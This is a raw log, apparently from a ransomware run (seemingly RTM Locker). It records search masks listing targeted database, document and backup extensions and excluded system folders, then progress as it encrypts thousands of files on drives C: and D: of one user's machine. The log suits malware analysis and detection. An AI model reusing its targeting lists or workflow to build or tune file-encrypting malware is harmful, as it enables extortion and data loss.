;wdb;wmdb;wrk;xdb;xld;xmlff>file:<!endwith:exe><!"\steamapps\" !"\Cache\" !"\Boot\" !"\Chrome\" !"\Firefox\" !"\Mozilla\" !"\Mozilla Firefox\" !"\MicrosoftEdge\" !"\Internet Explorer\" !"\Tor Browser\" !"\Opera\" !"\Opera Software\" !"\Common Files\" !"\Config.Msi\" !"\Intel\" !"\Microsoft\" !"\Microsoft Shared\" !"\Microsoft.NET\" !"\MSBuild\" !"\MSOCache\" !"\Packages\" !"\PerfLogs\" !"\ProgramData\" !"\System Volume Information\" !"\tmp\" !"\Temp\" !"\USOShared\" !"\Windows\" !"\Windows Defender\" !"\Windows Journal\" !"\Windows NT\" !"\Windows Photo Viewer\" !"\Windows Security\" !"\Windows.old\" !"\WindowsApps\" !"\WindowsPowerShell\" !"\WINNT\" !"\$RECYCLE.BIN\" !"\$WINDOWS.~BT\" !"\$Windows.~WS\" !":\Users\Public\" !":\Users\Default\" !"C:\Users\ferre\AppData\Local\0F983A3D-FC63-C07E-6477-E3A5238DEF4B">wholefilename:<!"desktop.ini" !"iconcache.db" !"thumbs.db" !"ntuser.ini" !"boot.ini" !"ntdetect.com" !"ntldr" !"NTUSER.DAT" !"bootmgr" !"BOOTNXT" !"BOOTTGT" !"session.tmp" !"rtmlocker_DECRYPTION.txt"><!size:0>
[13:48:46] [*] Everything SetSearch...
[13:48:46] [*] Everything SetRequestFlags...
[13:48:46] [*] Everything SetSort...
[13:48:47] [*] Everything Query...
[13:48:47] [*] Total files to encrypt: 858
[13:48:47] [*] Final Speed: 678 MB/sec (678 MB, elapsed: 1 sec)
[13:48:47] [*] Everything EnumResult of other ext on drive: C:\
[13:48:47] [*] Search mask: <file:><nocase:><path:C:\><!ext:;exe;386;cmd;deskthemepack;diagcab;diagcfg;diagpkg;dll;info;mui;sys;theme;tmp;sql;sqlite;sqlite3;sqlitedb;mdf;mdb;adb;db;db3;dbf;dbs;udb;dbv;dbx;edb;exb;1cd;fdb;idb;mpd;myd;odb;xls;xlsx;doc;docx;bac;bak;back;zip;rar;dt;4dd;4dl;abcddb;abs;abx;accdb;accdc;accde;accdr;accdt;accdw;accft;ade;adf;adn;adp;alf;arc;ask;bacpac;bdf;btr;cat;cdb;chck;ckp;cma;cpd;dacpac;dad;dadiagrams;daschema;db-shm;db-wal;db2;dbc;dbt;dcb;dct;dcx;ddl;dlis;dp1;dqy;dsk;dsn;dtsx;dxl;eco;ecx;epim;fcd;fic;fm5;fmp;fmp12;fmpsl;fol;fp3;fp4;fp5;fp7;fpt;frm;gdb;grdb;gwi;hdb;his;hjt;ib;icg;icr;ihx;itdb;itw;jet;jtx;kdb;kexi;kexic;kexis;lgc;lut;lwx;maf;maq;mar;mas;mav;maw;mdn;mdt;mrg;mud;mwb;ndf;nnt;nrmlib;ns2;ns3;ns4;nsf;nv;nv2;nwdb;nyf;oqy;ora;orx;owc;p96;p97;pan;pdb;pdm;pnz;qry;qvd;rbf;rctd;rod;rodx;rpd;rsd;s2db;sas7bdat;sbf;scx;sdb;sdc;sdf;sis;sl3;spq;sqlite2;te;temx;tmd;tps;trc;trm;udl;usr;v12;vis;vpd;vvv;wdb;wmdb;wrk;xdb;xld;xmlff>file:<!endwith:exe><!"\steamapps\" !"\Cache\" !"\Boot\" !"\Chrome\" !"\Firefox\" !"\Mozilla\" !"\Mozilla Firefox\" !"\MicrosoftEdge\" !"\Internet Explorer\" !"\Tor Browser\" !"\Opera\" !"\Opera Software\" !"\Common Files\" !"\Config.Msi\" !"\Intel\" !"\Microsoft\" !"\Microsoft Shared\" !"\Microsoft.NET\" !"\MSBuild\" !"\MSOCache\" !"\Packages\" !"\PerfLogs\" !"\ProgramData\" !"\System Volume Information\" !"\tmp\" !"\Temp\" !"\USOShared\" !"\Windows\" !"\Windows Defender\" !"\Windows Journal\" !"\Windows NT\" !"\Windows Photo Viewer\" !"\Windows Security\" !"\Windows.old\" !"\WindowsApps\" !"\WindowsPowerShell\" !"\WINNT\" !"\$RECYCLE.BIN\" !"\$WINDOWS.~BT\" !"\$Windows.~WS\" !":\Users\Public\" !":\Users\Default\" !"C:\Users\ferre\AppData\Local\0F983A3D-FC63-C07E-6477-E3A5238DEF4B">wholefilename:<!"desktop.ini" !"iconcache.db" !"thumbs.db" !"ntuser.ini" !"boot.ini" !"ntdetect.com" !"ntldr" !"NTUSER.DAT" !"bootmgr" !"BOOTNXT" !"BOOTTGT" !"session.tmp" !"rtmlocker_DECRYPTION.txt"><!size:0>
[13:48:47] [*] Everything SetSearch...
[13:48:47] [*] Everything SetRequestFlags...
[13:48:47] [*] Everything SetSort...
[13:48:47] [*] Everything Query...
[13:48:47] [*] Unlock queued: C:\Users\ferre\AppData\Local\ConnectedDevicesPlatform\4f4e80ddba764ee9\ActivitiesCache.db-wal
[13:48:47] [*] Unlock queued: C:\Users\ferre\AppData\Local\ConnectedDevicesPlatform\4f4e80ddba764ee9\ActivitiesCache.db-shm
[13:48:47] [*] Unlock queued: C:\Users\ferre\AppData\Local\ConnectedDevicesPlatform\4f4e80ddba764ee9\ActivitiesCache.db
[13:48:52] [*] Total files to encrypt: 17460
[13:48:52] [*] Cycle 1, Step 2: 1000 files processed (5 %)
[13:48:52] [*] Speed: 258 MB/sec (258 MB, elapsed: 1 sec)
[13:48:52] [*] Cycle 1, Step 2: 2000 files processed (11 %)
[13:48:52] [*] Speed: 408 MB/sec (408 MB, elapsed: 1 sec)
[13:48:52] [*] Cycle 1, Step 2: 3000 files processed (17 %)
[13:48:52] [*] Speed: 523 MB/sec (523 MB, elapsed: 1 sec)
[13:48:52] [*] Cycle 1, Step 2: 4000 files processed (22 %)
[13:48:52] [*] Speed: 595 MB/sec (595 MB, elapsed: 1 sec)
[13:48:52] [*] Cycle 1, Step 2: 5000 files processed (28 %)
[13:48:52] [*] Speed: 613 MB/sec (613 MB, elapsed: 1 sec)
[13:48:52] [*] Cycle 1, Step 2: 6000 files processed (34 %)
[13:48:52] [*] Speed: 720 MB/sec (720 MB, elapsed: 1 sec)
[13:48:52] [*] Cycle 1, Step 2: 7000 files processed (40 %)
[13:48:52] [*] Speed: 976 MB/sec (976 MB, elapsed: 1 sec)
[13:48:52] [*] Cycle 1, Step 2: 8000 files processed (45 %)
[13:48:52] [*] Speed: 1162 MB/sec (1162 MB, elapsed: 1 sec)
[13:48:53] [*] Unlock queued: C:\Users\ferre\AppData\Local\AMD\DxCache\0f396940d401ccd330dbfe231952c6599cb0d49d64e04c3d.bin
[13:48:53] [*] Unlock queued: C:\Program Files\AMD\atikmdag_dce.log
[13:48:53] [*] Unlock queued: C:\Users\ferre\OneDrive\.849C9593-D756-4E56-8D6E-42412F2A707B
[13:48:53] [*] Unlock queued: C:\Program Files\TeamViewer\TeamViewer15_Logfile.log
[13:48:53] [*] Unlock queued: C:\Program Files\CCleaner\LOG\su_controller.log
[13:49:08] [*] Unlock queued: C:\Users\ferre\AppData\Local\AMD\DxCache\5f940a9a4c8c1dcff9f6ce9576d3f82ff8ed0f6f5b484844.bin
[13:49:08] [*] Unlock queued: C:\Program Files\CCleaner\LOG\su_telemetry.log
[13:49:14] [*] Cycle 1, Step 2: 9000 files processed (51 %)
[13:49:14] [*] Speed: 54 MB/sec (1198 MB, elapsed: 22 sec)
[13:49:14] [*] Cycle 1, Step 2: 10000 files processed (57 %)
[13:49:14] [*] Speed: 58 MB/sec (1279 MB, elapsed: 22 sec)
[13:49:14] [*] Cycle 1, Step 2: 11000 files processed (62 %)
[13:49:14] [*] Speed: 65 MB/sec (1437 MB, elapsed: 22 sec)
[13:49:14] [*] Cycle 1, Step 2: 12000 files processed (68 %)
[13:49:14] [*] Speed: 375 MB/sec (8267 MB, elapsed: 22 sec)
[13:49:22] [*] Unlock queued: C:\Users\ferre\AppData\Local\AMD\DxCache\74c3bee8b6ad00e6d86f339be3f9ac55fa06fc0fb379a741.bin
[13:49:26] [*] Unlock queued: C:\Users\ferre\AppData\Local\AMD\DxCache\61a6062baf4f31ae750f386ce71aa370b7bba5dda27098ac.bin
[13:49:27] [*] Unlock queued: C:\Users\ferre\NTUSER.DAT{a2332f18-cdbf-11ec-8680-002248483d79}.TM.blf
[13:49:27] [*] Unlock queued: C:\Users\ferre\NTUSER.DAT{a2332f18-cdbf-11ec-8680-002248483d79}.TMContainer00000000000000000001.regtrans-ms
[13:49:27] [*] Unlock queued: C:\Users\ferre\NTUSER.DAT{a2332f18-cdbf-11ec-8680-002248483d79}.TMContainer00000000000000000002.regtrans-ms
[13:49:27] [*] Unlock queued: C:\Users\ferre\ntuser.dat.LOG2
[13:49:27] [*] Unlock queued: C:\Users\ferre\ntuser.dat.LOG1
[13:49:32] [*] Cycle 1, Step 2: 13000 files processed (74 %)
[13:49:32] [*] Speed: 212 MB/sec (8270 MB, elapsed: 39 sec)
[13:49:32] [*] Cycle 1, Step 2: 14000 files processed (80 %)
[13:49:32] [*] Speed: 212 MB/sec (8274 MB, elapsed: 39 sec)
[13:49:32] [*] Cycle 1, Step 2: 15000 files processed (85 %)
[13:49:32] [*] Speed: 212 MB/sec (8291 MB, elapsed: 39 sec)
[13:49:32] [*] Cycle 1, Step 2: 16000 files processed (91 %)
[13:49:32] [*] Speed: 212 MB/sec (8292 MB, elapsed: 39 sec)
[13:49:48] [*] Unlock queued: C:\Users\ferre\AppData\Local\AMD\DxCache\33106ff85698c0950e5c1dcd8dab183fabcea10707dbaf46.bin
[13:49:55] [*] Cycle 1, Step 2: 17000 files processed (97 %)
[13:49:55] [*] Speed: 133 MB/sec (8293 MB, elapsed: 62 sec)
[13:49:55] [*] Final Speed: 134 MB/sec (8318 MB, elapsed: 62 sec)
[13:49:55] [*] Everything EnumResult of priority ext on drive: D:\
[13:49:55] [*] Search mask: <file:><nocase:><path:D:\><ext:;sql;sqlite;sqlite3;sqlitedb;mdf;mdb;adb;db;db3;dbf;dbs;udb;dbv;dbx;edb;exb;1cd;fdb;idb;mpd;myd;odb;xls;xlsx;doc;docx;bac;bak;back;zip;rar;dt;4dd;4dl;abcddb;abs;abx;accdb;accdc;accde;accdr;accdt;accdw;accft;ade;adf;adn;adp;alf;arc;ask;bacpac;bdf;btr;cat;cdb;chck;ckp;cma;cpd;dacpac;dad;dadiagrams;daschema;db-shm;db-wal;db2;dbc;dbt;dcb;dct;dcx;ddl;dlis;dp1;dqy;dsk;dsn;dtsx;dxl;eco;ecx;epim;fcd;fic;fm5;fmp;fmp12;fmpsl;fol;fp3;fp4;fp5;fp7;fpt;frm;gdb;grdb;gwi;hdb;his;hjt;ib;icg;icr;ihx;itdb;itw;jet;jtx;kdb;kexi;kexic;kexis;lgc;lut;lwx;maf;maq;mar;mas;mav;maw;mdn;mdt;mrg;mud;mwb;ndf;nnt;nrmlib;ns2;ns3;ns4;nsf;nv;nv2;nwdb;nyf;oqy;ora;orx;owc;p96;p97;pan;pdb;pdm;pnz;qry;qvd;rbf;rctd;rod;rodx;rpd;rsd;s2db;sas7bdat;sbf;scx;sdb;sdc;sdf;sis;sl3;spq;sqlite2;te;temx;tmd;tps;trc;trm;udl;usr;v12;vis;vpd;vvv;wdb;wmdb;wrk;xdb;xld;xmlff>file:<!endwith:exe><!"\steamapps\" !"\Cache\" !"\Boot\" !"\Chrome\" !"\Firefox\" !"\Mozilla\" !"\Mozilla Firefox\" !"\MicrosoftEdge\" !"\Internet Explorer\" !"\Tor Browser\" !"\Opera\" !"\Opera Software\" !"\Common Files\" !"\Config.Msi\" !"\Intel\" !"\Microsoft\" !"\Microsoft Shared\" !"\Microsoft.NET\" !"\MSBuild\" !"\MSOCache\" !"\Packages\" !"\PerfLogs\" !"\ProgramData\" !"\System Volume Information\" !"\tmp\" !"\Temp\" !"\USOShared\" !"\Windows\" !"\Windows Defender\" !"\Windows Journal\" !"\Windows NT\" !"\Windows Photo Viewer\" !"\Windows Security\" !"\Windows.old\" !"\WindowsApps\" !"\WindowsPowerShell\" !"\WINNT\" !"\$RECYCLE.BIN\" !"\$WINDOWS.~BT\" !"\$Windows.~WS\" !":\Users\Public\" !":\Users\Default\" !"C:\Users\ferre\AppData\Local\0F983A3D-FC63-C07E-6477-E3A5238DEF4B">wholefilename:<!"desktop.ini" !"iconcache.db" !"thumbs.db" !"ntuser.ini" !"boot.ini" !"ntdetect.com" !"ntldr" !"NTUSER.DAT" !"bootmgr" !"BOOTNXT" !"BOOTTGT" !"session.tmp" !"rtmlocker_DECRYPTION.txt"><!size:0>
[13:49:55] [*] Everything SetSearch...
[13:49:55] [*] Everything SetRequestFlags...
[13:49:55] [*] Everything SetSort...
[13:49:55] [*] Everything Query...
[13:49:57] [*] Total files to encrypt: 301
[13:49:57] [*] Final Speed: 3834 MB/sec (3834 MB, elapsed: 1 sec)
[13:49:57] [*] Everything EnumResult of other ext on drive: D:\
[13:49:57] [*] Search mask: <file:><nocase:><path:D:\><!ext:;exe;386;cmd;deskthemepack;diagcab;diagcfg;diagpkg;dll;info;mui;sys;theme;tmp;sql;sqlite;sqlite3;sqlitedb;mdf;mdb;adb;db;db3;dbf;dbs;udb;dbv;dbx;edb;exb;1cd;fdb;idb;mpd;myd;odb;xls;xlsx;doc;docx;bac;bak;back;zip;rar;dt;4dd;4dl;abcddb;abs;abx;accdb;accdc;accde;accdr;accdt;accdw;accft;ade;adf;adn;adp;alf;arc;ask;bacpac;bdf;btr;cat;cdb;chck;ckp;cma;cpd;dacpac;dad;dadiagrams;daschema;db-shm;db-wal;db2;dbc;dbt;dcb;dct;dcx;ddl;dlis;dp1;dqy;dsk;dsn;dtsx;dxl;eco;ecx;epim;fcd;fic;fm5;fmp;fmp12;fmpsl;fol;fp3;fp4;fp5;fp7;fpt;frm;gdb;grdb;gwi;hdb;his;hjt;ib;icg;icr;ihx;itdb;itw;jet;jtx;kdb;kexi;kexic;kexis;lgc;lut;lwx;maf;maq;mar;mas;mav;maw;mdn;mdt;mrg;mud;mwb;ndf;nnt;nrmlib;ns2;ns3;ns4;nsf;nv;nv2;nwdb;nyf;oqy;ora;orx;owc;p96;p97;pan;pdb;pdm;pnz;qry;qvd;rbf;rctd;rod;rodx;rpd;rsd;s2db;sas7bdat;sbf;scx;sdb;sdc;sdf;sis;sl3;spq;sqlite2;te;temx;tmd;tps;trc;trm;udl;usr;v12;vis;vpd;vvv;wdb;wmdb;wrk;xdb;xld;xmlff>file:<!endwith:exe><!"\steamapps\" !"\Cache\" !"\Boot\" !"\Chrome\" !"\Firefox\" !"\Mozilla\" !"\Mozilla Firefox\" !"\MicrosoftEdge\" !"\Internet Explorer\" !"\Tor Browser\" !"\Opera\" !"\Opera Software\" !"\Common Files\" !"\Config.Msi\" !"\Intel\" !"\Microsoft\" !"\Microsoft Shared\" !"\Microsoft.NET\" !"\MSBuild\" !"\MSOCache\" !"\Packages\" !"\PerfLogs\" !"\ProgramData\" !"\System Volume Information\" !"\tmp\" !"\Temp\" !"\USOShared\" !"\Windows\" !"\Windows Defender\" !"\Windows Journal\" !"\Windows NT\" !"\Windows Photo Viewer\" !"\Windows Security\" !"\Windows.old\" !"\WindowsApps\" !"\WindowsPowerShell\" !"\WINNT\" !"\$RECYCLE.BIN\" !"\$WINDOWS.~BT\" !"\$Windows.~WS\" !":\Users\Public\" !":\Users\Default\" !"C:\Users\ferre\AppData\Local\0F983A3D-FC63-C07E-6477-E3A5238DEF4B">wholefilename:<!"desktop.ini" !"iconcache.db" !"thumbs.db" !"ntuser.ini" !"boot.ini" !"ntdetect.com" !"ntldr" !"NTUSER.DAT" !"bootmgr" !"BOOTNXT" !"BOOTTGT" !"session.tmp" !"rtmlocker_DECRYPTION.txt"><!size:0>
[13:49:57] [*] Everything SetSearch...
[13:49:57] [*] Everything SetRequestFlags...
[13:49:57] [*] Everything SetSort...
[13:49:57] [*] Everything Query...
[13:49:58] [*] Total files to encrypt: 2686
[13:49:58] [*] Cycle 1, Step 2: 1000 files processed (37 %)
[13:49:58] [*] Speed: 2326 MB/sec (2326 MB, elapsed: 1 sec)
[13:49:58] [*] Cycle 1, Step 2: 2000 files processed (74 %)
[13:49:58] [*] Speed: 3593 MB/sec (3593 MB, elapsed: 1 sec)
[13:49:58] [*] Final Speed: 4532 MB/sec (4532 MB, elapsed: 1 sec)
[13:49:58] [*] Starting search on drive: \\?\Volume{53c3d83f-8af8-4376-b16c-791eec0d5cd3}\
[13:49:58] [*] Starting search on drive: \\?\Volume{ed2c760d-9c10-4768-bb7f-cf7abc08fda3}\
[13:49:58] [*] Everything Scan finished.
[13:49:58] [*] Exiting thread search...
[13:49:58] [*] Added STOP MARKER to local thread.